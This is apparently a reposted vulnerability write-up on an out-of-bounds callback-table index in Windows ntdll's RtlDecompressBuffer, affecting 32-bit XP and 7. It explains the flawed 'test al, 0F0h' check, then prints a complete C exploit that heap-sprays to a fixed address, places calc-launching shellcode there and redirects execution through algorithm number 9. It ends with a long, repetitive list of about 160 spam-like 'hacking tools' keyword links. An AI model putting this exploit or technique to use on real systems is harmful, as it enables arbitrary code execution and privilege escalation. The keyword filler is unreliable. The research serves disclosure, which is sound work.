RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:

int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6) {   int result; // eax@4    if ( algorithm & algorithm != 1 )   {     if ( algorithm & 0xF0 )       result = -1073741217;     else       result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);   }   else   {     result = -1073741811;   }   return result; }

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.

let's check the disassembly on Win7 32bits:

• the movzx limits the boundaries to 16bits
• the test ax, ax avoids the algorithm 0
• the cmp ax, 1 avoids the algorithm 1
• the test al, 0F0h limits the boundary .. wait .. al?

Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 

So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:

And the exploit code:

/*     ntdll!RtlDecompressBuffer() vtable exploit + heap spray     by @sha0coder  */  #include  #include  #include   #define KB  1024 #define MB  1024*KB #define BLK_SZ 4096 #define ALLOC 200 #define MAGIC_DECOMPRESSION_AGORITHM 9  // WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php /* unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93" "\xBF\x77\xFF\xD2\xCC" "\xE8\xF3\xFF\xFF\xFF" "\x63\x61\x6C\x63"; */  // https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html char *shellcode =        "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"        "\x45\x81\x3e\x43\x72\x65\x61\x75"        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"        "\x6c\x63\x89\xe2\x52\x52\x53\x53"        "\x53\x53\x53\x53\x52\x53\xff\xd7";   PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits  void fail(const char *msg) {   printf("%s\n\n", msg);   exit(1); }  PUCHAR spray(HANDLE heap) {   PUCHAR map = 0;    printf("Spraying ...\n");   printf("Aproximating to %p\n", landing_ptr);    while (map < landing_ptr-1*MB) {     map = HeapAlloc(heap, 0, 1*MB);   }    //map = HeapAlloc(heap, 0, 1*MB);    printf("Aproximated to [%x - %x]\n", map, map+1*MB);     printf("Landing adddr: %x\n", landing_ptr);   printf("Offset of landing adddr: %d\n", landing_ptr-map);    return map; }  void landing_sigtrap(int num_of_traps) {   memset(landing_ptr, 0xcc, num_of_traps); }  void copy_shellcode(void) {   memcpy(landing_ptr, shellcode, strlen(shellcode));  }  int main(int argc, char **argv) {   FARPROC RtlDecompressBuffer;   NTSTATUS ntStat;   HANDLE heap;   PUCHAR compressed, uncompressed;   ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;    RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");    heap = GetProcessHeap();    compressed_sz = estimated_uncompressed_sz = 1*KB;    compressed = HeapAlloc(heap, 0, compressed_sz);    uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);     spray(heap);   copy_shellcode();   //landing_sigtrap(1*KB);   printf("Landing ...\n");    ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);    switch(ntStat) {     case STATUS_SUCCESS:       printf("decompression Ok!\n");       break;      case STATUS_INVALID_PARAMETER:       printf("bad compression parameter\n");       break;       case STATUS_UNSUPPORTED_COMPRESSION:       printf("unsuported compression\n");       break;      case STATUS_BAD_COMPRESSION_BUFFER:       printf("Need more uncompressed buffer\n");       break;      default:       printf("weird decompression state\n");       break;   }    printf("end.\n"); } 

The attack vector

 
 This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7
 
 
 

Continue reading

1. Physical Pentest Tools
2. Hacking Tools Pc
3. Best Hacking Tools 2020
4. Pentest Tools For Mac
5. Nsa Hacker Tools
6. Beginner Hacker Tools
7. Top Pentest Tools
8. Hacking Tools Usb
9. Hack App
10. Hack Tools For Ubuntu
11. Physical Pentest Tools
12. What Is Hacking Tools
13. Hack Tools Download
14. Pentest Tools Online
15. New Hack Tools
16. Hack Tools Mac
17. Hack Tools
18. Hacking Tools For Games
19. Hacking Tools Software
20. Pentest Tools Port Scanner
21. Game Hacking
22. Hacking Tools Kit
23. Tools 4 Hack
24. Hacker Tools For Ios
25. Hacking Tools For Games
26. Hack Tools Online
27. Hacker Tools 2020
28. Hacking Apps
29. Hack Tools For Windows
30. Github Hacking Tools
31. Hack Tools For Ubuntu
32. Hacker Tools 2020
33. Hacking Tools For Mac
34. Hacker Tools For Windows
35. Hacker Techniques Tools And Incident Handling
36. New Hack Tools
37. Pentest Tools Nmap
38. Hacker Tools Apk Download
39. Pentest Tools Nmap
40. Pentest Tools Find Subdomains
41. Nsa Hacker Tools
42. Pentest Tools List
43. Hack Tools For Pc
44. Hacking Tools For Pc
45. Pentest Tools Subdomain
46. Hacking Tools Github
47. How To Hack
48. Hack Tools Mac
49. Pentest Tools Bluekeep
50. Hacking Tools For Windows Free Download
51. Pentest Box Tools Download
52. New Hacker Tools
53. Hak5 Tools
54. Hack Tools Github
55. Ethical Hacker Tools
56. Hacking Tools For Games
57. Hack Website Online Tool
58. Hacker Tools Github
59. Hacker Tools Free Download
60. Hack Tools
61. Growth Hacker Tools
62. Hackrf Tools
63. Hacker Tools
64. Hacking Tools Mac
65. Pentest Tools For Ubuntu
66. Hacking Tools Name
67. Pentest Recon Tools
68. Pentest Tools Android
69. Tools Used For Hacking
70. Pentest Tools For Mac
71. Hacking Tools Github
72. Hacker Tools Github
73. Hacker Security Tools
74. World No 1 Hacker Software
75. Hacking Tools For Pc
76. Pentest Tools Find Subdomains
77. Growth Hacker Tools
78. Pentest Tools Website Vulnerability
79. Pentest Tools
80. Pentest Tools Nmap
81. Hacker Tools
82. Kik Hack Tools
83. Hack Rom Tools
84. Hack Tools
85. Pentest Tools Open Source
86. Hack Rom Tools
87. Hak5 Tools
88. Hacker Tools Free
89. Hacking Tools For Windows 7
90. Pentest Tools Bluekeep
91. Hack Rom Tools
92. Hacker Tools Free Download
93. Hack Tools For Windows
94. Hacker Tools Github
95. Hacking Tools For Mac
96. Pentest Recon Tools
97. Hacking Tools For Kali Linux
98. Hacking Tools 2020
99. Hacker Tool Kit
100. Best Pentesting Tools 2018
101. Hacker Tools Github
102. Pentest Tools Alternative
103. Black Hat Hacker Tools
104. Hacking Apps
105. Blackhat Hacker Tools
106. Free Pentest Tools For Windows
107. Best Pentesting Tools 2018
108. Pentest Tools Subdomain
109. Hacker Tool Kit
110. Hacker Tools Apk Download
111. Pentest Tools Bluekeep
112. Hacking Tools Software
113. Hack Tools Download
114. Game Hacking
115. Hacker Techniques Tools And Incident Handling
116. Hacking Tools Pc
117. Pentest Tools Windows
118. Pentest Tools Subdomain
119. Nsa Hacker Tools
120. Github Hacking Tools
121. Hacker Tools 2019
122. Pentest Box Tools Download
123. Hack Tools Online
124. Hack Tools Mac
125. Bluetooth Hacking Tools Kali
126. Hacker Security Tools
127. Nsa Hack Tools Download
128. Hacking Tools For Mac
129. How To Hack
130. Hacks And Tools
131. Hacker Tools 2019
132. Hacker Tools
133. Hack Tools
134. Install Pentest Tools Ubuntu
135. Hacker Security Tools
136. Hack Tools Github
137. Hacker Tools 2020
138. Hacker Tools Apk Download
139. Tools 4 Hack
140. Hacker Tools Apk Download
141. Hack Tools For Games
142. Hacks And Tools
143. How To Hack
144. Pentest Tools Alternative
145. Hacking Tools For Windows 7
146. Hack Tools Download
147. Hacker Tools Free Download
148. Hacker Tools For Ios
149. Hacking Apps
150. Pentest Tools Github
151. Hacking Tools For Beginners
152. Hack Website Online Tool
153. Hacker Tools Linux
154. Hack Apps
155. Pentest Tools Alternative
156. Termux Hacking Tools 2019
157. Hack Tool Apk
158. Hacking Tools For Mac
159. Pentest Tools List
160. Pentest Tools Apk